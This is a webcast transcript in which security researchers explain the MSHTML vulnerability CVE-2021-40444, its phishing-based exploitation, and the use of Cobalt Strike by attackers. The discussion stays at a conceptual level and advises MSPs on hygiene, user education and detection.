Skip to main content
Right of Boom
January 30, 2025

MSHTML Vulnerability & What it Means to Your MSP

In this video, industry experts John Hammond and Bryson Bort discuss the intricate details and implications of the CVE-2021-40444 vulnerability affecting MSHTML in Windows. They explore how this vulnerability can be exploited through phishing emails and the potential broader impact it has on cybersecurity for MSPs and SMBs. The discussion also dives into the importance of proactive communication and preparedness in cybersecurity, emphasizing the need for continuous education and vigilance to defend against evolving threats.<ul><li>The MSHTML vulnerability (CVE2021 40444) allows remote code execution and is not limited to Microsoft Office, as it affects the MSHTML component used across various applications including Windows 11.</li><li>Cobalt Strike, a legitimate software for penetration testing, is frequently exploited by threat actors using cracked versions to gain control and deploy malware in compromised environments.</li><li>Effective cybersecurity requires a combination of good hygiene practices, user education, and monitoring for indicators of compromise, particularly for vulnerabilities that do not yet have patches.</li></ul>

Guests

Andrew Morgan

Video Transcript

All right, we're back a week off. Welcome, everyone. Thank you for joining us. I got quite the, uh, guest lineup today, so I'm really excited that, um, you guys are all with us. Um, starting things off, I just have a few quick announcements. Gary, this is only gonna take maybe 15 or 20 minutes, so, uh, we'll get right on into it after, after that. Okay.

Um, so in the call to action, uh, the little green, um, icon below, um, the reason I'm calling out Cisco partner Elevate, it is a two day event starting tomorrow. Um, the entire crew of the cyber cast is going to be involved in that event, um, as well as Chris la um, they've got a new, Wes and Chris gonna be doing a new, uh, incident tabletop. Wait, wait, wait. They Told me when they asked me to speak that it was exclusive. They let anyone in these days, Chris. Yeah, you should know that.

Yeah, you're gonna back out now. Um, Ryan, and, and we have cyber resilience. Um, and then, um, uh, we have, um, oh, this is really interesting. So Phyllis Lee and Jason Slagel, uh, have teamed up, I think Jason's out there, but, um, Rachel Veno of Cisco, who has a degree in cyber, really sharp, uh, is they're doing a two part session on C-I-S-I-G one, the top five, um, uh, um, controls, and now IE safeguards, uh, for your MSP. So it's gonna be a working session.

And then we may do subsequent things following that, because again, we're, I thought you Were kidding that this would take 15 minutes. So the stats show that, you know, we, we gotta get MSPs up to speed on framework, um, because 65% still haven't put in at least IG one or an equivalent. Um, I put a poll in. And, and with that, um, I want to introduce, um, two guests that we've had here before. Bryson. Let's start off with you. Tell us a little about yourself.

Um, the role you play and the fun things you do on the side. Know that you guys are both heavily involved on red teaming and, and, uh, events. So go ahead, Bryson. Um, sure. I'm, I'm Bryson. I am the manager of the cyber research unit at ConnectWise or the, the CRU. Uh, so we, we do research. I mean, it's right there in the name, um, research into intelligence, into latest vulnerabilities. And, and our main purpose is to improve the, uh, threat detection in ConnectWise products.

So, primarily Perch. Uh, pretty much everybody on my team was part of the PERCH acquisition. Um, so, so that's what I do in my day job. Uh, sometimes on the weekends when I have extra time, which, which hasn't been much recently, but I also do, uh, a live stream about hacking, um, CTFs, uh, reverse engineering, that sort of thing. Um, and then also just as part of my role at Perch now ConnectWise, I also organize CTFs, that ConnectWise host, we've got one coming up actually in October.

We're doing, we've got a bunch of stuff for cybersecurity awareness month in October. So we've got a CTF, we're actually doing a two week long CTF with new challenges coming out every three days. So we're gonna, we're gonna spread it out and give people time to really dig into it. Instead of the, the mad rush in 24 hours that we normally do. We're gonna give people time so that, that'll be coming up, uh, in, in a little over a month. Yeah. Great. I think start a month from now. Great.

Speaking of CTFs, are you banning John, who I'm gonna let introduce himself from, uh, entering your, uh, CTF uh, Bryson? No. He, he's actually participated before. Yeah. We, we've had John. Oh. Oh yeah. John, thanks for coming on. Tell us a little about yourself, for those that don't know you. Thanks so much, Andrew, and thanks for everyone for letting me come hang out. Uh, hey. Hi. Hello. My name is John Hammond. I'm a senior security researcher over at Huntress.

Uh, I work in their threat operations department, so I get to stay technical, be nerdy, kind of be on the keyboard and hunt down hackers, and look at malware and do all the fun stuff. But also, I, I try to do a lot of other education and outreach and public stuff like this just to get out in the community. Um, so that's why we're hanging out. That's, that's why I'm super happy to be here with you.

Um, but while Hunters helps pay the bills off on the side, uh, kind of as, as, as Bryon said, um, I'd like to be in the scene with other capsule flag and cybersecurity stuff. I have a, I have a cheesy YouTube channel, um, and I'm, and I'm hosting a, a another capsule flag again in a similar vein, um, this coming Thursday with, with Hacker one, one of the, um, other bug bounty or vulnerability disclosure programs. So a lot of fun stuff. Try to stay busy. Yeah, don't be so modest there, Mr.

Uh, Hammond, you almost have 300,000 subscribers. We'll put the link in about that for your thing. And then if you have yours, Bryson, I'll put that in as well. All right. Let's get right on into it. Are you sure that's not what pays The bills? Fair enough. Thanks for that, Wes. Yeah.

So, um, both of you guys, John and Bryce, and the reason I wanted you both on is because as soon as this M-S-H-T-M-L vulnerability came out, the zero day both of you guys selflessly took to the communities, and I saw you guys both nonstop. Um, John, you published, I know your entire executive team was away, and you published a really nicely done article that got put up on MSSP alert. Uh, I'll put that URL in as well. Great job, Bryson.

Uh, you were posting a lot of in MSP geek, and, uh, we did a video on it as well. So, uh, on the heels of the previous cyber call two weeks ago, we had Darren Roberts on from Black Hills, and we were really to talking, we were talking about threat, um, uh, sorry, we were talking about, uh, threat modeling, adversarial ation. And one of the topics was Cobalt strike. Now, cobalt Strike, John, you'll talk a little about that.

I know coming up here that it's not used ubiquitously in this attack, but this is something that's an off the shelf solution that is just seems to be a threat actor favorite these days. So I really wanted to dig into this and get everybody up to speed the MSPs on where things are with this. 'cause Microsoft has known for a little while about this vulnerability. And, um, you know, I want our, our, our community to know what to do and how to best defend themselves and this.

So with that, Wes, let's get everybody on the same page. Both you and Ryan are gonna kinda level set on, you know, the technical thing. So people aren't necessarily lost. Some people out there are highly technical know all about this, some don't. So let's start off with you, Wes. Yeah, Right on. So I've got a series of questions, but let's, let's start with this one. And Bryson, I'll let you kick us off. And then, um, John, add anything in that you would like as well.

Let's let, as Andrew said, let's make sure we level set, talk to us about what MS. HTML is used for, um, how, like it's legitimate use cases. And then let's talk a little bit more about how this, um, how the latest news around this vulnerability is working. Okay. Um, so the, the vulnerability we're talking about, it's CVE 20 21, 4 0 4 4 4, and it's a, it's a remote code execution in M-S-H-T-M-L. So M-S-H-T-M-L, uh, specifically is usually referencing the file mshtml dot dll.

And that is a library that comes with Windows that renders html. So if you're using Internet Explorer, this is actually the, the library that's gen generating that, taking that, that raw HTML text and turning into a document that you can view inside of Internet Explorer. However, it's not just use an internet explorer, it, it's a DLL that other applications can use. It's been in things like, uh, like the steam, like steam.

So if you're, if you're a gamer and if you've used steam, they've, they've updated it. So it's not in there anymore. But it used to use this M-S-H-T-M-L, um, Skype, uh, office. So whenever you generate, you're, you know, viewing HTML as as and actually rendering that inside of office documents, it's using this M-S-H-T-M-L. So the vulnerability is not specifically in office.

And I think that's where some of the initial confusion and things came out is we thought, oh, it's another office vulnerability. And yes, it is, but it's not just office. It's this underlying component that's in Windows. Um, and, and even in Windows 11. So Windows 11 doesn't include Internet Explorer, but it does include M-S-H-T-M-L, so it also has the same vulnerability. So it's, it's a little bit broader than what we originally thought when this first, uh, advisory came out. Awesome.

John, anything else you wanna add to that? Yeah, I'll, I'll spin off that just a little bit. Um, 'cause Bryson did a great job kind of setting the stage and that there's an easy initial thought that, oh, this is just a Microsoft Office thing where you see, oh, a Doc X file and you think of phishing campaign. So you think of a malware that might come in the form of a macro that we often hear about, oh, macro enabled phishing attacks and stuff like that.

Uh, I think it's needs to be very clear that with CVE 20 21, 4 0 4, 4 4, and I, I like to just add a bunch of other fours at the end. 'cause it sounds funny there, uh, this doesn't require any macros. Um, the reason as Bryson was alluding to, like, there's a little bit more danger in this and it's not strictly a Doc X file, it's not strictly a PowerPoint X file. It's, it could very well be something in there in like the rich text format.

Um, and if something were to simply render that and try to display that, while it might reach out to grab oh, external images, or it might try to load something from a, a remote location, that's where this really starts to kick off. 'cause what if that remote location were serving something more malicious?

Um, that's why we've seen some of those scary proof of concepts and videos out online where, oh, if you open the file in your file browser, if you see it in there with preview mode enabled, it'll try and display the page and it'll kickstart the payload and do some of those dangerous things. Uh, so I think this has been very spooky and very scary 'cause we haven't seen a patch or anything to help kind of mitigate or remediate this, remediate this. Okay.

So that, that, John, that brings up some, so as I'm doing some reading and I'm really trying to dive in and understand what's happening here, it does seem to me like thing, like a lot of classic cybersecurity hygiene should come into play with all of this, right? Like, things like, um, principle of least privilege is helpful.

A lot of the, the articles I've read speak a lot about, hey, if you have users with administrative privilege, those typically are gonna be the ones that are, um, have the biggest vulnerability point, which, you know, for, um, MSPs on the call, typically that's you guys. So you need to be aware that you're probably the number one threat vector that's there.

But, you know, I also think making sure that like protected view and and Outlook, making sure that that is enabled and it's there by default off on purpose and making sure we haven't turned that off for ease of use. Maybe a user complained about it and we flipped it off, those are things that are gonna cause you pain down the road. But talk to us a little bit more, John, about like classic defenses that you should have in place that really will help mitigate this from the get go.

Because to me it does seem like a lot of this is classic security hygiene that needs to be in place. I agree. Um, as you mentioned, hey, making sure protected view is enabled. So if you're to open a document, it won't kickstart any macros or any other malicious payloads.

Um, obviously whatever you can do for filtering and monitoring and egress traffic, oh, things might be coming in, in an email, in that phishing example, uh, hey, let's try to block other unknown senders that might have some attachment that we really just don't need to see. Um, if you get into the buzzwords of zero trust and other, oh, artificial intelligence machine learning stuff, uh, those are all great and fine and dandy.

Uh, I think it really does boil down to a lot of your own individual awareness and, and know how, uh, we don't really trust any strange document or RTF file that could be from an unknown location, from an untrusted location. Uh, it really sucks to boil down to this conversation. We, and we just say, oh, remain vigilant without a patch. Maybe, maybe that's the best we can do. Yeah, yeah, indeed. Um, so Bryson, I wanna talk about ActiveX for just a minute, right?

Because that's sort of embedded in the core of all of this. Like, I, I, I guess maybe two questions, and John you can jump in on this one too. Like, do we even need ActiveX anymore? Like, is, why are we still talking about this? How is ActiveX legitimately used and how have you also seen, um, malware target ActiveX A a ALA MSH, TM L? Well, do we, do we need it?

Um, it, it's one of those things that there are a lot of organizations out there that need it for legacy applications that they've got running. Um, yeah, we, we should probably get rid of it like we did with Flash. Um, it, it's, it's definitely something that, I mean, it's, it's letting you run code in your browser, um, that's just always a, a rich target for exploitation. Um, and, and it has been throughout its history, um, which is why it's been weeded out.

I mean, really only Internet Explorer is pretty much the only web browser that even supports it. Um, if you, but that also means that if you want to use ActiveX, if you've got those legacy applications, you have to use this M-S-H-T-M-L library. It's not something you just switch to Chrome or, or something like that to, to work around because, um, MS. HTML is really the only thing that will even support it or do ActiveX. Um, so yeah, it's, it's still there. Now.

If, if you don't have any of those legacy applications, then no, you don't need it. And they're really, you shouldn't be writing new stuff for it anymore. There's, there's better ways to do things. Um, was, was there any second part to that question? Well, uh, yeah, maybe just, uh, like how we've seen ActiveX being utilized in the wild before. Okay. Uh, as an attack surface.

Well, for, for this particular attack, um, I mean it's, it's, it's remote, it's running code in your browser, so it, it, it's, it's remote code execution is, is kind of where the, the main thing is with, with, uh, ActiveX. Um, in this case it's just letting you download a file and then execute it. Um, and that, I mean, that's, that's really what it's gonna boils down to. And then, and it just kind of comes down to what is that file gonna be? Is, is it malware, is it cobalt strike?

Is it, you know, some, some sort of bot, uh, it could be anything. So it's, it's just lets you download code and execute it. Got it. John, anything else you wanna add to that?

I, I think so, um, when, when you ask, Hey, have we seen ActiveX or this sort of sort of technique and, and other attacks or other incidents, um, I think oftentimes when we look at how cyber criminals get in and how they maintain access and what they do for their exploitation, uh, you talk about living off the land as, hey, you don't wanna bring all of your tools to the toolkit. If you, you're, if you're going to attack some other external thing, you, you're like a Taurus in a new island.

You try, you try the, the native food. You look at the sites out there, uh, when you live off the land, you use a lot of the utilities that are already on that target computer. And when you're working in Windows, if, if your Windows operating system is your victim, uh, there are a lot of things that have that backwards compatibility that, that Bryson was alluding to. Especially when you look at that old Internet Explorer and how it's so deeply ingrained into Microsoft and Windows.

Uh, it had all that functionality to run visual basic script code or do those JS script kind of its own dialect of JavaScript and, uh, all of those things, right? They could be very well used in an HTA file. We often hear that in the m old M-S-H-T-A program.

Uh, and I don't mean to get all that technical and nerdy, sorry, but all of those things are potentially an option to being able to create a new ActiveX object or use some of the WScript shell and internal window stuff that could very well be powerful and damaging depending on how it's used. Um, so I think this ActiveX incident on its own is, is another fine example of that.

So you're, you're stumbling wisely into my last question for you, John, is, uh, if you look at the, the cyber kill chain, right? We see, we've seen, seen weaponization delivery primarily over office or office documents via email, but you kind of hinted at it's possible that whether it's this vulnerability or I'm asking to kind of put on your like, prediction hat a little bit with me.

Like, do you see this sort of evolving or changing in such a way that we may see other attack delivery methods that aren't just primarily office documents via attachments sent to a user? Oh, there's a lot to unpack there. Sorry. Yeah. I, I might, I might miss your question if you can help steer me toward it. Sure.

Uh, again, but I, I, I think there are a lot of tricks and techniques packed into this vulnerability and this CVE 'cause the exploit that we've seen in the wild, the, the known attacks that have been ongoing. And I think Microsoft, I think folks have even said, Hey, this has been going on for a month now, and now we're just starting to talk about this. Uh, I think it opens the door for initial access in that phishing scenario that we're discussing.

And that means that the bad individuals, the cyber criminals have code execution. So what they do next is totally up to them. Do they want to load up Cobalt strike and do their own post exploitation? Do they wanna try and exfiltrate data? Um, what user privileges are they running as, are they an admin user right off the bat? Can we do some other lateral movement go compromise the whole domain, et cetera, et cetera. Uh, I think this vulnerability opens the door for much more damage.

'cause it will give you that initial access and code execution. Okay. With that said, have I completely butchered your question? Well, I liked, I, I, I, I think I understand where I missed on asking, but that was actually really very interesting and super helpful to me. Um, like on the post side, I know Ryan's gonna ask some more like, you know, post exploitation, uh, side of the house too, to jump more into what you just mentioned.

But like, let's take other things that theoretically render, um, MS HD mail, like, uh, non Outlook stuff, like I think, uh, Skype and there's some other Microsoft platforms. I don't know if Teams does and others, but, um, do you, we, do we see other attack vectors that may go at, do you foresee other attack vectors that may go off other platforms that could render and, and see and use M-S-H-T-M-L? Does that make sense? Yes. Sorry.

Uh, and I think the, the clear answer is, is yes, um, if you'll boil down to the, the technical details, and I don't mean to, I feel like there are three other stages of what CVE 20 21, 4 0 4, 4 4 pulls off and does, um, that M-S-H-T-M-L portion could do something else. I don't think we've dug into the analysis on that, dug into all the research yet.

Uh, but right now, from what we've seen is like Kickstarting A-A-D-L-L or a CAB file, um, I think with a little bit more ingenuity, with a little bit more, uh, creativity from the, from threat actors, it could very well do something different. Uh, Bryson, what do you think? Am I driving in the wrong direction there? No, I, I, I think you're right. It seems like almost every day last week there was a new way of exploiting this. There.

There's, you know, or, or originally it was just, Hey, be careful with your word docs, enable protected mode and you should be good. And then we start finding, well, no, uh, your PowerPoint in Excel. Um, and there's some, there's ways to bypass protected mode. Um, oh, hey, look, an RTF file in preview mode and Windows Explorer will trigger it as well.

And, and, and just, yeah, there's this, this underlying component, this MSH TM L is used in a number of other places, and potentially anywhere that is used could be exploited. So, um, yeah, uh, Skype potentially, you know, maybe preview mode and outlook that I've seen some people hint at that as a possibility, though I haven't seen any definite proof of that. Uh, so, so there's, there's definitely I think, more ways this could be exploited that we've yet to learn about.

Um, we'll, we'll see what happens. Yeah. Fantastic. So, yeah, John, and, and, uh, Bryson, thank you for, uh, answering some of my questions individually. That really helps me and hopefully helps the group. So, um, uh, Ryan, I'll turn it over to you, my friend. I, Yeah, so this, we're gonna, we're gonna get a little more about like, how this is actually being leveraged. I think you set that up pretty well.

Seems to be like if you, if you do a Google search of like threat actor plus CV 22 1 4 0 4 4 4, or ransomware plus S-H-T-M-L, the only thing that's really coming up is this could lead to Cobalt Strike. And like Cobalt Strike isn't a threat actor, it's, it's actually a valid piece of software if you Google it. Like, it's a, it's a thing people actually use to, to, to do penetration tests.

And then we talked about Cobalt strike several times, um, in the recent past, one associated with TA 5, 5 1, shocker, email based threat actor group. Um, so talk to us a little bit more Cobalt strike and why it's really so important for MSPs and, and SMBs to be able to detect Cobalt Strike Beacons and, and, and really what it means for them if a threat actor has implanted Cobalt strike in their environment. Bryon, you wanna get 'em all rolling, I'm sure. Um, yeah.

So the, the reason why Cobalt Strike keeps coming up is 'cause the, the, the, uh, the samples that have been coming out, the ones that we've seen and we've been evaluating, were, uh, deploying a cobalt strike, uh, payload. Um, so originally Microsoft just non advisory, they said, just because, uh, it, the attacks been witnessed in the wild, and that's really all they said.

Uh, there wasn't a lot of details provided then samples started coming out, and as we looked at the samples, the cobalt strike of the payload, now, yes, cobalt Strike is valid software, it's red team, uh, adversary em, emulation software. Uh, it's, it's great stuff. Um, they're not doing anything bad. They're not bad people that it's just, there have been cracked versions of it that have been leaked.

And because it's really good at what it does, attackers have picked up on that and, and done their own thing. Um, and there was actually even, like this morning, this, uh, Vermilion strike, which, which is a, a new, um, it is basically a, a, a, uh, uh, some, some, some, some of the bad guys like just kind of generated what Cobalt Strike does and made their own payload that runs in Linux. Um, and I haven't, I haven't read a lot about it.

I'm, I'm summarizing, but at any, at any point, yeah, it, it lets the bad guys just do what they wanna do on your system. It gives them a foothold. Um, lets them then execute whatever other payload they want, whether it's a coin miner or ransomware, or just stealing your data. Um, it, it's just gets them in there and lets them do their, their own thing. And yes, it's valid, but it's been cracked and, and, uh, it's being used by the bad guys too. Okay. Yeah.

So I'll reiterate what we said the last time we talked about Coldwell Strike. If you get alerted by your MDR Sim, so Hunters Partners, that you have a Cobalt Strike instance in your environment that is not a, eh, I'll fix it this afternoon. That's a, I'm dropping everything and I'm fixing this right now. Okay. cobol. So, and Cobalt Strike is a very generic indicator. It doesn't necessarily tell you the threat actor, it just tells you very, you're, you're very far along in the attack chain.

They have, effectively, the attacker has their tool set in your environment now, which makes them very dangerous. Um, so I guess, yeah, I'll hand it over to you, Gary, and then I'll circle back. I don't mean to interject gentlemen. Uh, I suddenly got pulled for some little household emergency. Uh, if you're still kicking around when I get back, I'd love to tune back into you, but I'm super sorry, uh, duty calls. I'm good. Hopeful everything's okay. Thanks, your honor. Okay.

So, John, well, Bryson, I guess it's me and you, man. I, I guess so, yeah. So first question I has as I'm listening is like, timing. You mentioned that this could have been back as far as a month. Like normally with something like this, this is pretty broad, right? The number of people that use Microsoft products, um, how long normally are these things out? And then, you know, to pick us kind of through the chron, like the chronology of what happened so we can understand?

Well, so these, these kind of vulnerabilities that can be exploited through office documents, they get used all the time. And e even after they've been patched or we've known about 'em for years, um, they're still very commonly used. You know, there's like an Excel, um, vulnerability from I think 2017 that's still like the most commonly exploited one in phishing emails.

Um, once, once, once these things come out, they just keep being used over and over and over again because they're, they're very effective. And, uh, it's really easy to bypass that security, um, because people will click the enable link, enable macros, enable editing, um, even though we, we keep telling 'em not to, they, they keep doing it. Uh, as far as the timeline for this particular vulnerability, uh, Tuesday is when we first learned about it.

That's when Microsoft released, uh, their, their, uh, advisory that last Tuesday, the seventh, um, it was about a month ago, I think, when it was first, uh, exploited. We, we've started now that we're doing some retro hunting. So now that we have a little bit of an idea of what, what's going on, and we can look back, um, particularly like in tools like virus total where people are uploading files, um, they files, uh, may show up clean when they first get uploaded, the virus total.

But then when people, when you can, um, there's, there's tools. If you've got like the enterprise version, you can, you can enable like some Yara signatures that will do retroactive hunting and, and look back through the files. And so we're finding file samples going back till early August. Um, the, there was a number of researchers who first found this, I think, uh, some guys from Mandiant, I believe, uh, they've done about it for, you know, maybe about a week or so before the rest of us did.

They discovered it, and then it was discovered it was used in the wild. And that's when the, the advisory came out. So when Microsoft first announced it on the seventh, or yeah, the seventh, um, you know, it was just the word. Um, you know, it was, it was being, it was an active X controlling word that was being exploited. And, and then by the eighth, we started seeing a lot of chatter on Twitter. Um, Kevin Beaumont in particular, uh, was, was doing a lot of research into this.

You follow him on Twitter, and he was talking about some new ways of doing it. He talked about ways to, you know, bypass the, the fixes that Microsoft was recommended. And then, uh, some other people were talking about, you know, how you can the RTF and Windows preview. So really by by the ninth, we, we had a pretty good, um, understanding that this was much more than the initial Microsoft advisory warned us about. Now that being said, uh, we don't know a lot about the initial, um, campaign.

So, so we know it was being used. We don't exactly know who was being targeted, uh, based on Microsoft's advisory. It was a targeted attack. Um, and there's, we haven't really seen it being exploited a lot, at least last week. Now, over this weekend, um, well throughout, throughout the week last week, there were a number of, uh, documents found and examples. And from that, some people started writing POCs. Now they were being careful.

Um, you've gotta be careful with this kind of thing 'cause it's still vulnerable. There's not a patch for it yet. So most of the research, I mean, most of the things that are coming out are about researchers doing their own research rather than new attack vectors that we've seen being used. Um, so they haven't been releasing a lot of source code, but at this point, there's enough information known that there is some source code out there.

There's some POCs, there's even tools for building these malicious documents. Um, and in particular, some of the hacker forms picked up on that over the weekend. So, so now you can, um, get the tools to generate these documents. So I expect this week we're gonna start seeing a lot more active exploitation than what we did last week. Yeah.

You know, this just goes to what we've been talking about when, you know, we've been working really hard here and for me with my, you know, true methods members of just kind of drilling in this conversation with prospects and customers around assumed breach mentality. And I think this goes a long way into understanding, um, the timeline and what's happening, what you just explained. Um, you know, e everyone is vulnerable to some degree, right? Uh, or another. So I had two other questions.

One, how and what do you think an MSP should or shouldn't be communicating when something like this comes up to their customer base? So Again, the, the most common method of exploitation right now is through phishing emails. Um, and you, you would get the email, you'd have to open it, and you actually have to, you know, specifically allow, like, click on that enable edit, uh, in order for the, the ActiveX control to, to work.

Now again, there, there have been workarounds and things, other, other potential ways of, of doing this that have been discussed and explored, but that's still the, the, the most common method that we've actually seen. Um, so just user education, let them know that, hey, this is happening right now. Um, if you can come up with some examples. So there's, there's a few examples. The most common one that I've seen, uh, the samples that I've seen, and, and then that's also been in the news.

It was like a letter from a lawyer. Um, so, you know, te tell your users about it, um, warn them about how it's exploited, you know, that you have to open, you know, open the file, clicking on enable edit, tell 'em not to do those things. Um, just delete it if you're not expecting it. You know, just user education I think will go a long way. Now, that being said, again, there have been other ways that have been discussed and, and explored as far as how this can be exploited.

Uh, but it still comes down to you've gotta get a file into, into a system at some way. Uh, so that's over email is gonna be the most common method for, for that happening. You know, like, so we saw the poll, right? 67% of people hadn't, you know, communicated. And so I'm thinking number one, that's something to think about. Like a, in this case, you probably can tell people, be extra vigilant your customers, this is what's going on.

You know, it shows that you're on top of things to your customers. And maybe prevent that once that one, you know, that one click for one customer that might have happened. But the other part of it is these are the kind of things that we need to be circling back.

Let from A-V-C-I-O standpoint, you know, with our decision makers and say, look, let me give you another example about what's happening here, and here's the things, you know, we put in place to try to protect you, but also there's things that are gonna happen through the biggest people in the world like Microsoft that we can't always protect. And no one else can tell you that. And, and it leads to the other things that they might not be investing in.

Um, so, um, Gary, yeah, Before you ask, ask your final, I do have a question for, not John's back, but John we're talking about, um, you know, Bryson just mentioned the phishing being probably the, you know, most prevalent way in which this is gonna be exploited. Um, for an msp my head's thinking for MSPs, do they want to be more vigilant, for example, right now in terms of emails coming in from their distributors, like, Hey, here's your, you know, P eight, your Ingram invoice.

'cause again, if you're a threat actor, and Ryan mentioned TA 5 51, so I'd love your comments on this too, Ryan, that's something that, you know, you send, you know, you'd wanna send maybe into whoever, you know, you look at LinkedIn or whoever who's the admin of that company. So then you could go laterally and potentially get to the RMM. Is that something that MSP should be kind of a little bit more heightened alert right now? Is that to me? Sorry. Yeah, either one.

Bryson, you or you John, if you need a minute, John, that's fine, Bryson. No, no, no. So I, I've had this thought, and I don't know if it was already discussed, forgive me. Uh, but I've tried to pose this around with a couple other individuals in the community. Um, it's a spooky thing. So I don't mean to be all doom and gloom. I don't mean to be all fud.

Um, but I think in the last couple of months in the recent slew of vulnerabilities that we've seen very, very recently just this year, is I think there has been a completely new and redefined, uh, attack chain to absolute complete compromise of, of a network and organization. I think, let's say we took this CVE 2021 MSH tml thing for initial access in phishing, you immediately get remote code execution. And then what if we took a print nightmare for privilege escalation, right?

Some of the recent things with the print schooler issue is, cool, cool. We have local administrator. If I'm acting as the adversary, um, then maybe we do just that as well for some lateral movement or, and what if we can get into the domain, uh, domain user in an active directory environment. And then Poti pot was a very hot topic in conversation, being able to compromise the domain.

I think this CVE opens the door with staging all of those other things we saw in the past few months to a complete takeover. Obviously we live in a world where, oh, organizations are still getting popped because we're using eight character passwords or something cheesy, something silly. Uh, but now if you are hardened, if you are secure with your password policy, with your use of two FA, et cetera, um, uh, I, I think we, we got a little bit of work to do.

'cause we're seeing these new issues and these new flaws that, uh, we don't see patches for that we haven't seen addressed, that we haven't seen the mitigations and workarounds being all that effective. It's, oh dang, have we dropped the ball? Because this CVE opens the door for an absolute potential full weaponization of everything else that just came through the door.

Okay, on that thread, one of the things that I think is really dangerous about this one is the sign of an exploit is primarily the presence of another piece of malicious software. So a lot of people, when a patch comes out, will hopefully apply the patch, but once the patch comes out, that doesn't necessarily mean that the attacker hasn't maintained a persistent foothold in your environment from the time where you are vulnerable.

And so we might not be seeing a lot of exploitation of this in the next even month or so because attackers are just, it's just a land grab right now. They're trying to get footholds in as many environments as they can see which ones they can persist in, and then take their time to go through and ransom them later. So don't just think the, the patch is gonna be the, the thing that saves you here.

You need to go back and you need to make sure that all of these kind of secondary infections are not there, and that these persistence footholds are, are, are, are, are not present, because that's ultimately gonna be the way that you get, you know, you, you get yourself into a bad couple of weeks. Yeah. You know, Andrew, I was just gonna say, I, I very much agree with that.

And, um, half Medium is an example of that too, where you saw foothold after foothold with these web shells being, being spun up. And, uh, you also look at like how cybercrime typically operates now, right? It's not like one guy that does everything. Now you have access brokers that literally buy, and they, they literally have a market they build that they sell access that they've been granted. They don't wanna do anything else.

They'd rather just pop something, get persistence, and then sell it to the highest bidder. Uh, so you're exactly right. Those things become really, really important for you to understand. It's not just about I apply to Patch and I'm immune. The really capable ransomware affiliate groups, so not the, not the, the threat actor themselves with the affiliate groups hire roles called pen testers. And a pen tester's role is to gain initial access to a victim.

So there's literally someone in most of the really effective affiliate groups whose only job it is, is to accumulate footholds into as many customers, customers as they can, right? And so this is like, this is like a gift from the gods to one of those pen testers. They're like, oh, you just made my job easy. I'll just, I'll just go rent some time on TA 5 51 and, uh, shoot a bunch of docs out.

And, um, yeah, I'll just, I'll stick my feet up on my chair for the rest of the month because we're gonna have more targets than we can potentially act on. So yeah, this one, this one's serious. Like, if you're not taking this one seriously, this one's bad. And I don't think we're gonna see the real extent of the damage for another probably four to six weeks. Thanks for that.

Tha thanks guys for humor me on that, Gary, sorry to Yeah, no, I, I wanna take, take a minute and address a couple things that came up in chat. Adam said he hasn't communicated this because they don't have a solution yet. Like they don't know the scope yet until it's fully got a wrap. Adam, what I'd say is no, I mean, I, I it's not your issue and you're not a bad IT provider because you don't have a solution to this. It's that that's not really what your job is.

It's much bigger than you or anyone else. So I think more communication sooner is better. Yeah. Number one, uh, for sure. Number two, and um, Keith asked this, like if you're a small shop, it just seems like keeping up with all this, you know, with posts and Reddits and blogs and podcasts is just so much. And he said, Hey, I'm small. Listen, it's not just you Keith, I know people that have 10, 15 texts, they would say the same exact thing. You know, that, that you're saying.

And um, Andrew, we don't really have a solution yet, right? Uh, for that. And that's one of the reasons why we're here to try to consolidate and bring some information. But this is going to con like, somehow this has to move forward right in, in some way. That's a very left of boom mentality though. The, the idea of I can't communicate because I don't have something that prevents it from happening yet. That you have a, remember you have a right of boom answer here.

We are actively monitoring your environment for the secondary indicators of an attack and a foothold. That's a very powerful message. Like, okay, we don't have a, It's if you're, if you're actively monitoring the environment for the secondary right? And if you're not, then yeah, you should probably worry and just, you know, be disabling all the things right now.

But to, to Ryan your point and write a boom, guys, um, for those of you that don't know me once the attack has happened, so you have your prevention and middle way of detection side and we'll, we'll put something in shortly. Yeah. But I mean, Cobalt Strike beacons are not super difficult to, to identify. There's a lot of good information out there. Yeah.

And that's, if that's the primary way right now, you should be focusing a lot of your energy on detect Cobalt Strike Beacons in your environment. And that's gonna give you a very good, uh, kind of story for those customers. Sorry Andrew. So, So, no, no, no. I'm glad this came up, Gary.

'cause one of the questions, and I think that you might have had it, but it's like Jacob raised it, Jacob Wiley raised it in the q and a of, hey, aside from doing great hygiene or good hygiene, is there anything else we can do?

So maybe like, Gary, can you kind of walk through and collectively with the team here of this write of boom thing, like again, you know, are there things we can be doing if we had the right, you know, post boom things in place, or, or even, you know, IOC talk about, you know, Wes, maybe if you could IOCs indicated of compromise, what things we can do so that we're not sitting there in a post boom scenario, uh, running for the hills at the end. Gary thoughts? Or do you want Wes to take that?

Yeah, let let Wes go first. Yeah. So I have a lot of thoughts on this. Um, first, I understand those of you on the call that feel overwhelmed. Like, you, you, you didn't even know anything about this today. You still feel like I'm sort of muddy on it. And then there's gonna be five more that are gonna pop up next week. I get it. Here's, here's where your shining hope is, is just like you don't try to do all your it all by yourself.

You choose and select vendors that provide services for you that do important things for you. Uh, you need to and must be doing the same thing in the world of cybersecurity. And let me prove this and illustrate it. I'm gonna ask John and Bryson, I want both of you to answer this.

Uh, Bryson let you go first, since we have seen this Ms M-S-H-T-M-L vulnerability come up, how many people in the CRU and at ConnectWise overall have been active in this, researching it, doing regression analysis to look through it, doing additional hunting and research through all of it. Like just gimme a quick synopsis of what the heck you guys have done on behalf of all their partners behind the scenes. And then John, I want you to do the same.

Um, well we, so my entire team's, you know, done at least some work on this over the past week. And that's, that's myself and, uh, three other people. Um, we have written our own proof of concept. You know, uh, we, we've, the first thing we did once we actually got a copy of the exploit that was, you know, being circulated, um, is we ran it through our lab. We, we, our lab has all of our products on it. So, you know, we were able to see what does this look like for our customers?

What logs are generated, what kind of network artifacts, um, took a p cap of that. We wrote some signatures for detection, you know, made sure we can at least detect what happens in our lab and got that working. Um, and yeah, so everybody on our team kind of worked together, got that done. And, uh, and, and we're still actively involved in, you know, other groups.

We've, you know, got lines of communication with other researchers and other companies and, and are keeping an eye on what they're doing as well, uh, besides just Twitter, you know, some, some private forms and, and Slack channels. Um, so yeah, I'd, I'd say everybody on our team. So that's, that's four people. Uh, you know, we have, um, engaged some of our security analysts, you know, as we find tips and things that help us detect what's going on, we will, we'll send that information to them.

And if they've got free time, they'll do some hunting as well. We've added it to some of our automated, you know, besides the, the regular detection capabilities we have. Um, we've have some threat hunting scripts that we do. So we've added, you know, capabilities in there as well.

